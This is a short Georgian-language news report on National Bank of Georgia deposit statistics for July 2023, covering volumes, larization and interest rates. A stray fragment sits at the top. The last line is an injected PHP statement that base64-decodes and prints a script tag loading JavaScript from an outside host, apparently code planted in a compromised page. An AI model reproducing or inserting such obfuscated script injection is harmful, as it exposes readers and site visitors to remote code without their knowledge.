celsiusi
ავერსი შნაიდერი

 საქართველოს ეროვნული ბანკის ანგარიშის მიხედვით, საბანკო სექტორში განთავსებული არასაბანკო დეპოზიტების მოცულობამ 2023 წლის ივლისის ბოლოსათვის 47.78 მლრდ ლარი შეადგინა, რაც 989.47 მლნ ლარით, ანუ 2.11%-ით მეტია წინა თვის ბოლოს არსებულ მაჩვენებელზე.

ცენტრალური ბანკის ცნობით, ივლისში, წინა თვესთან შედარებით, ადგილი ჰქონდა ვადიანი დეპოზიტების ზრდას 436.54 მლნ ლარით, ანუ 2.44%-ით, ხოლო მოთხოვნამდე დეპოზიტები 552.93 მლნ ლარით, ანუ 1.91%-ით გაიზარდა.

სებ-ის ანგარიშის მიხედვით, დეპოზიტების ლარიზაციის კოეფიციენტმა 2023 წლის ივლისის ბოლოსათვის 49.36 პროცენტი შეადგინა. წინა თვის ბოლო მდგომარეობასთან შედარებით, დეპოზიტების ლარიზაცია გაიზარდა 0.13 პროცენტული პუნქტით.

ამასთან, ეროვნული ბანკის მონაცემებით, ივლისში ვადიან დეპოზიტებზე საშუალო წლიურმა შეწონილმა საბაზრო საპროცენტო განაკვეთმა 8.14% შეადგინა, მათ შორის ეროვნული ვალუტით განთავსებულ დეპოზიტებზე – 10.79%, ხოლო უცხოური ვალუტით განთავსებულ დეპოზიტებზე – 1.51%.

უცხოური ვალუტით განთავსებულ დეპოზიტებში აშშ დოლარის წილმა – 78.57%, ხოლო ევროს წილმა 19.45% შეადგინა.

575
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");